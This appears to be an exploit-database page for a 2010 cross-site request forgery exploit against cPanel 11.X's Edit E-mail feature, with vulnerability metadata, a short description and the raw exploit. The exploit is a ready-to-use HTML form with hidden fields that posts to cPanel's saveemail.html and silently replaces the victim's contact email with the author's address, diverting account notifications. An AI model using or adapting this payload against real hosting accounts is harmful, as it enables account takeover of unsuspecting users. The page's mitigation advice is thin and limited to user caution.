header-logo
Suggest Exploit
vendor:
Cpanel
by:
Mon7rF
5.5
CVSS
MEDIUM
Cross Site Request Forgery
352
CWE
Product Name: Cpanel
Affected Version From: Cpanel version 11.X
Affected Version To: Cpanel version 11.X
Patch Exists:
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows 7
2010

Cpanel 11.X Edit E-mail Cross Site Request Forgery exploit

This exploit allows an attacker to perform unauthorized actions on behalf of a user by tricking them into clicking a specially crafted link or visiting a malicious website. In this case, the exploit targets the Cpanel 11.X Edit E-mail feature.

Mitigation:

To mitigate this vulnerability, users should be cautious when clicking on links or visiting websites, especially when prompted to enter sensitive information or perform actions that they did not initiate.
Source

Exploit-DB raw data:

# Exploit Title: Cpanel 11.X Edit E-mail  Cross Site Request Forgery exploit
# Date: 22 - 10 - 2010
# Author: Mon7rF
# Mail : X0h@msn.com
# Tested on: Windows 7

--------------------------------------------------------------------------------------

<form onsubmit="return do_validate(this.id);" id="mainform" name="mainform"  
action="http://www.site.com:2082/frontend/x3/contact/saveemail.html">

<input id="email"                    name="email"                    type="hidden" value="X0h@msn.com">
<input id="second_email"             name="second_email"             type="hidden" value="">
<input id="notify_disk_limit"        name="notify_disk_limit"        type="hidden" value="1">
<input id="notify_bandwidth_limit"   name="notify_bandwidth_limit"   type="hidden" value="1">
<input id="notify_email_quota_limit" name="notify_email_quota_limit" type="hidden" value="1">

<input type="submit" class="input-button" value="Save">

</form>

--------------------------------------------------------------------------------------

Gr33ts : RENO - Mr.M3x - all Member p0c Team ..